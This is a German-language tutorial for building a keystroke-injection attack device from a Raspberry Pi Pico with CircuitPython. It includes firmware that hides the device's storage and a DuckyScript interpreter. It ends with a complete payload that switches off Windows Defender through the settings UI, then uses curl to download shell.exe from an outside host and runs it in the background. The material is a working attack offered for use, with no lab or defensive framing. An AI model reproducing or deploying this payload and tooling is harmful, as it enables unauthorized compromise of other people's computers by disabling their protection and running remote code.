Raspberry pico
Spezifikationen
- RP2040 Mikrocontroller-Chip
- Dual-Core-Arm Cortex M0+ Prozessor, flexibler Takt mit bis zu 133 MHz
- 264 KB SRAM und 2 MB integrierter Flash-Speicher
- Direktes Löten auf der Platine möglich
- USB 1.1 mit Geräte- und Hostunterstützung
- Energiesparmodus und Ruhezustand
- Drag-and-Drop-Programmierung über USB
- 26 GPIO-Pins (3.3V)
- 2 × SPI, 2 × I2C, 2 × UART, 3 × 12-Bit-ADC, 16 × steuerbare PWM-Kanäle
- RTC und Timer auf dem Chip
- Temperatursensor
- Gleitkomma-Bibliotheken auf dem Chip
- 8 × Programmierbare I/O State Machines (PIO) für benutzerdefinierte Peripherieunterstützung
Adafruit Install
- https://circuitpython.org/board/raspberry_pi_pico/
- https://downloads.circuitpython.org/bin/raspberry_pi_pico/de_DE/adafruit-circuitpython-raspberry_pi_pico-de_DE-7.0.0.uf2
Copy File
- cp ~/Download/adafruit-circuitpython-raspberry_pi_pico-de_DE-7.0.0.uf2 .
Nach ein paar Sekunden wird eine "USB-Stick" mit dem Namen "CIRCUITPY" gemountet
Script
- Damit der Payload bearbeitet werden kann, muss PIN 15 mit GND verbunden werden
- Wenn PIN 15 nicht mit GND verbunden ist, wird das Filesystem nicht gemountet
Deutsches "Tastertur" Layout Einfügen
- Das vornstallierte Englische Layout und die Keycodes müssen ersetzt werden
- Verschieden Sprachen findet man in der Git Repo
https://github.com/Neradoc/Circuitpython_Keyboard_Layouts
File Mount
import digitalio
import storage
from board import *
class DEBUG_MOUNT():
noStorageStatus = False
noStoragePin = digitalio.DigitalInOut(GP15)
noStoragePin.switch_to_input(pull=digitalio.Pull.UP)
noStorageStatus = not noStoragePin.value
def mount(self):
if(self.noStorageStatus == True):
# don't show USB drive to host PC
try:
storage.disable_usb_drive()
except:
print("USB drive disabled")
return "disabled"
else:
# normal boot
print("USB drive enabled")
return "enabled"
Payload Ausführer
- Bei verschiedenen Tasterturlayouts müssen diese in den lib/adafruit ordner gelegt werden
import usb_hid
import time
import digitalio
from board import *
from debug import DEBUG_MOUNT
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_de import KeyboardLayoutDE
from adafruit_hid.keycode_de import Keycode
duckyCommands = ["WINDOWS", "GUI", "APP", "MENU", "SHIFT", "ALT", "CONTROL", "CTRL", "DOWNARROW", "DOWN",
"LEFTARROW", "LEFT", "RIGHTARROW", "RIGHT", "UPARROW", "UP", "BREAK", "PAUSE", "CAPSLOCK", "DELETE", "END",
"ESC", "ESCAPE", "HOME", "INSERT", "NUMLOCK", "PAGEUP", "PAGEDOWN", "PRINTSCREEN", "SCROLLLOCK", "SPACE",
"TAB", "ENTER", " a", " b", " c", " d", " e", " f", " g", " h", " i", " j", " k", " l", " m", " n", " o", " p", " q", " r", " s", " t",
" u", " v", " w", " x", " y", " z", " A", " B", " C", " D", " E", " F", " G", " H", " I", " J", " K", " L", " M", " N", " O", " P",
" Q", " R", " S", " T", " U", " V", " W", " X", " Y", " Z", "F1", "F2", "F3", "F4", "F5", "F6", "F7", "F8", "F9", "F10", "F11", "F12"]
keycodeCommands = [Keycode.WINDOWS, Keycode.GUI, Keycode.APPLICATION, Keycode.APPLICATION, Keycode.SHIFT, Keycode.ALT, Keycode.CONTROL,
Keycode.CONTROL, Keycode.DOWN_ARROW, Keycode.DOWN_ARROW ,Keycode.LEFT_ARROW, Keycode.LEFT_ARROW, Keycode.RIGHT_ARROW, Keycode.RIGHT_ARROW,
Keycode.UP_ARROW, Keycode.UP_ARROW, Keycode.PAUSE, Keycode.PAUSE, Keycode.CAPS_LOCK, Keycode.DELETE, Keycode.END, Keycode.ESCAPE,
Keycode.ESCAPE, Keycode.HOME, Keycode.INSERT, Keycode.KEYPAD_NUMLOCK, Keycode.PAGE_UP, Keycode.PAGE_DOWN, Keycode.PRINT_SCREEN,
Keycode.SCROLL_LOCK, Keycode.SPACE, Keycode.TAB, Keycode.ENTER, Keycode.A, Keycode.B, Keycode.C, Keycode.D, Keycode.E, Keycode.F, Keycode.G,
Keycode.H, Keycode.I, Keycode.J, Keycode.K, Keycode.L, Keycode.M, Keycode.N, Keycode.O, Keycode.P, Keycode.Q, Keycode.R, Keycode.S, Keycode.T,
Keycode.U, Keycode.V, Keycode.W, Keycode.X, Keycode.Y, Keycode.Z, Keycode.A, Keycode.B, Keycode.C, Keycode.D, Keycode.E, Keycode.F,
Keycode.G, Keycode.H, Keycode.I, Keycode.J, Keycode.K, Keycode.L, Keycode.M, Keycode.N, Keycode.O, Keycode.P,
Keycode.Q, Keycode.R, Keycode.S, Keycode.T, Keycode.U, Keycode.V, Keycode.W, Keycode.X, Keycode.Y, Keycode.Z,
Keycode.F1, Keycode.F2, Keycode.F3, Keycode.F4, Keycode.F5, Keycode.F6, Keycode.F7, Keycode.F8, Keycode.F9,
Keycode.F10, Keycode.F11, Keycode.F12]
def convertLine(line):
newline = []
print(line)
for j in range(len(keycodeCommands)):
if line.find(duckyCommands[j]) != -1:
newline.append(keycodeCommands[j])
print(newline)
return newline
def runScriptLine(line):
for k in line:
kbd.press(k)
kbd.release_all()
def sendString(line):
layout.write(line)
def parseLine(line):
if(line[0:3] == "REM"):
# ignore ducky script comments
pass
elif(line[0:5] == "DELAY"):
time.sleep(float(line[6:])/1000)
elif(line[0:6] == "STRING"):
sendString(line[7:])
else:
newScriptLine = convertLine(line)
runScriptLine(newScriptLine)
kbd = Keyboard(usb_hid.devices)
layout = KeyboardLayoutDE(kbd)
# sleep at the start to allow the device to be recognized by the host computer
time.sleep(.5)
defaultDelay = 300 #Default Delay zwischen den einzelnen Schritten
progStatus = DEBUG_MOUNT().mount()
for idx in range(1): #Der Payload wird 1 mal ausgeführt.
if(progStatus == "disabled"):
# not in setup mode, inject the payload
duckyScriptPath = "payload.dd"
f = open(duckyScriptPath,"r",encoding='utf-8')
print("Running payload.dd")
previousLine = ""
duckyScript = f.readlines()
for line in duckyScript:
line = line.rstrip()
if(line[0:6] == "REPEAT"):
for i in range(int(line[7:])):
#repeat the last command
parseLine(previousLine)
time.sleep(float(defaultDelay)/1000)
else:
parseLine(line)
previousLine = line
time.sleep(float(defaultDelay)/1000)
print("Done")
else:
print("Update your payload")
Payload
- Payload in DuckyScript geschrieben
DELAY 3500 REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard" DELAY 1000 REM disable windows defender, you may have to fiddle with this CTRL ESC DELAY 1000 STRING windows-sicherheit DELAY 1000 ENTER DELAY 3000 ENTER TAB TAB TAB TAB DELAY 300 ENTER DELAY 600 SPACE DELAY 600 LEFT ENTER DELAY 300 ALT F4 GUI r DELAY 2000 STRING cmd DELAY 600 ENTER DELAY 600 STRING curl http://fex.tuxmen.de/shell.exe --output shell.exe ENTER DELAY 2000 STRING START /b shell.exe ENTER DELAY 200 ALT F4